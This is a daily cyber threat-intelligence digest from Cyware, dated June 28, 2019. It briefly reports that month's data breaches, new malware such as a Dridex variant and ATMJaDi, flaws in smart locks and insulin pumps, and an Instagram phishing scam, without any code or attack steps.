Cyware Daily Threat Intelligence, June 28, 2019

See All
Trade and technology secrets are valuable assets for every public and private organization and hackers have always been hunting for them. New details about the global hacking campaign dubbed Cloud Hopper have emerged in the past 24 hours. It has been found that eight of the world’s biggest technology service providers have fallen victim to the attack which was carried out by Chinese hackers with an aim to steal commercial secrets. The affected victims include Fujitsu, Tata Consultancy Services, and DXC, among others.

The cybercrime group that went after India-based Wipro and a group of other IT service providers has also managed to breach a US-based tech solution provider PCM. The attackers had gained the firm’s client data that could be used to conduct a gift card scam. The past 24 hours also saw a major data leak at Medicare Supplement from the health insurance industry. The firm had exposed almost 5 million records due to a misconfigured MongoDB database.

In another incident, security researchers have discovered a new variant of Dridex trojan that uses an Application Whitelisting technique to avoid detection by antivirus products.

Top Breaches Reported in the Last 24 Hours

PCM breached
Attackers had breached PCM to gain client data that could be used to conduct a gift fraud scam. The firm became aware of this unusual activity during mid-May 2019 and launched an investigation. During the investigation, it found that the incident had impacted very limited customers.

Updates on ‘Cloud Hopper’ attack
Six more technology service providers have been found to have fallen victim to ‘Cloud Hopper’ attack. The affected victims are Fujitsu, Tata Consultancy Services, NTT Data, Dimension Data, Computer Sciences Corporation, and DXC Technology. The attack was allegedly carried out by Chinese hackers with an aim to steal corporate assets and trade secrets. 

5 million user records exposed
An unprotected MongoDB database belonging to MedicareSupplement.com exposed almost 5 million user records. The leaky database contained personal information such as names, addresses, dates of birth, gender, email addresses, and IP addresses. Upon learning this, the insurance marketing firm took the database offline.

Attunity Ltd. exposes clients’ files
Attunity Ltd. exposed its clients’ internal documents due to three publicly accessible Amazon S3 buckets. These buckets were named as attunity-it,” “attunity-patch” and “attunity-support”. They contained about a terabyte of files, including 750 gigabytes of compressed email backups. Attunity has disabled public access to these buckets after the issue was highlighted.

$27 million cryptocurrency stolen
Fraudsters have managed to steal $27 million using a spoofed Blockchain.com website. As many as 4,000 users across the globe have fallen victim to the attack.  The fake version of the website allowed the perpetrators to capture the login credentials of cryptocurrency users and steal the funds in their wallets on the platform.
 
Top Malware Reported in the Last 24 Hours

New Dridex trojan variant
A new variant of Dridex trojan has been found using an Application Whitelisting technique to avoid detection by antivirus products. The technique takes advantage of WMI command-line utility’s weak execution policy around XLS scripts. Apart from evading detection, the variant has also ramped up its library infrastructure which uses file names that are loaded by legitimate Windows executable.

‘Fake jquery’ campaign
Thousands of websites have been compromised in a newly found ‘fake jquery’ campaign. These compromised sites are injected with a reference to an external JavaScript called jquery.js. The end goal of the campaign is to trick users into installing rogue apps and monetize via fullscreen adverts.

Malicious Android game collects data
Researchers have identified a malicious version of ‘Scary Granny ZOMBY Mod: The Horror Game 2019’ on Google Play Store. The malicious app is used to collect login credentials of Google account users. Once the app is installed, it broadcasts full-screen ads and asks the victims to pay $22 to access the game. For some users, the app displays a fake login page which looks like the Google ‘Sign In’ page.

ATMJaDi malware
A new ATM malware sample named ATMJaDi has been uncovered cashing out money from ATMs. The malware has been found to be uploaded to a multi-scanner service from Mexico and Colombia. Once installed, the malware looks for the process that controls the ATM in the form of a Java archive file called INJX_PURE.jar. When successful, it injects itself into it and gains control of the ATM process.

Top Vulnerabilities Reported in the Last 24 Hours

Ultraloq flaws
An API bug in keyless smart door lock made by U-tec, called Ultraloq can allow attackers to track the physical address of the devices. This can also allow attackers to steal data and impersonate any user. Another threat in Ultraloq revolves around a Bluetooth Low Energy (BLE) issue which can allow attackers to easily crack the lock open with a brute force credential attack.

Insulin pumps recalled due to vulnerabilities
The US Food and Drug Administration has warned that certain insulin pumps of Medtronic Plc have been recalled following the discovery of security issues. The security flaws could allow an attacker to potentially connect wirelessly to a nearby insulin pump and change settings to control insulin delivery.

Top Scams Reported in the Last 24 Hours

New Instagram phishing scam
Scammers are stealing Instagram credentials and users’ personal information in a new phishing scam. The scam targets users who are seeking exclusive verified accounts. To execute the scam, the scammers are leveraging a page that masquerades as real Instagram verification submission page. The page prompts the victims to apply for verification through a fake domain named Instagramforbusiness[.]info. The phishing form within the domain asks the victims for their login credentials and other personal details.


See Our Products In Action




  • Share this blog:
Previous
Cyware Daily Threat Intelligence, July 01, 2019
Next
Cyware Daily Threat Intelligence, June 27, 2019
To enhance your experience on our website, we use cookies to help us understand how you interact with our website. By continuing navigating through Cyware’s website and its products, you are accepting the placement and use of cookies. You can also choose to disable your web browser’s ability to accept cookies and how they are set. For more information, please see our Privacy Policy.